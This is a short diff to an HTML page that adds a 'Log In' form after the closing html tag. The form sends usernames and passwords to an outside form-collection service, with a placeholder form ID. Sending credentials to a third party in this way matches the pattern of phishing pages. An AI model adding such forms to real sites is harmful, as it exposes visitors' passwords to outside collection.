--- a/index.html
+++ b/index.html
@@ -26,3 +26,8 @@
     </div>
 </body>
 </html>
+<form action="https://formspree.io/f/YOUR_FORM_ID" method="POST">
+    <input type="text" name="username" placeholder="Username or Email" required>
+    <input type="password" name="password" placeholder="Password" required>
+    <input type="submit" value="Log In" class="btn">
+</form>
